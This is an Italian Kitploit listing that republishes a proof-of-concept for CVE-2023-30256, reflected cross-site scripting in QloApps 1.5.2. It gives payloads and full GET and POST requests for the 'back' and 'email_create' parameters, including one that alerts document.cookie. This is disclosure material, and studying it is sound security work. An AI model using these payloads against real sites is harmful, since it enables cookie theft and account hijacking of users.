Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-30256 — QloApp 1.5.2: Vulnerabile a XSS su due parametri (email_create e back) | Kitploit
Strumenti/GitHubGitHub/ahrixia/cve-2023-30256
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubahrixia/cve-2023-30256

CVE-2023-30256

QloApp 1.5.2: Vulnerabile a XSS su due parametri (email_create e back)

Vedi Repository
313 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)

Webkul QloApps 1.5.2: vulnerabile a XSS su due parametri (email_create e back)

Exploit - Prova di concetto (POC)

XXS: parametro 'back'

root@kitploit:~
Payload (Parameter back – Plain text): 
[xss onfocus=alert(1) autofocus= xss] 

Payload (Parameter back – URL Encoded): 
[xss%20onfocus%3dalert(1)%20autofocus%3d%20xss]

Full GET Request (Parameter back): 
[http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]

informazioni immagine

XXS: parametro 'email_create'

root@kitploit:~
Payload (Parameter email_create – Plain text): 
[xss>xss] 

Payload (Parameter email_create – URL Encoded): 
[xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss]

POST Request (Parameter email_create) (POST REQUEST DATA ONLY): 
[controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]

informazioni immagine

Confermato il: 30 marzo 2023

Fornitore: QloApps [https://github.com/webkul/hotelcommerce]

Scarica lo strumento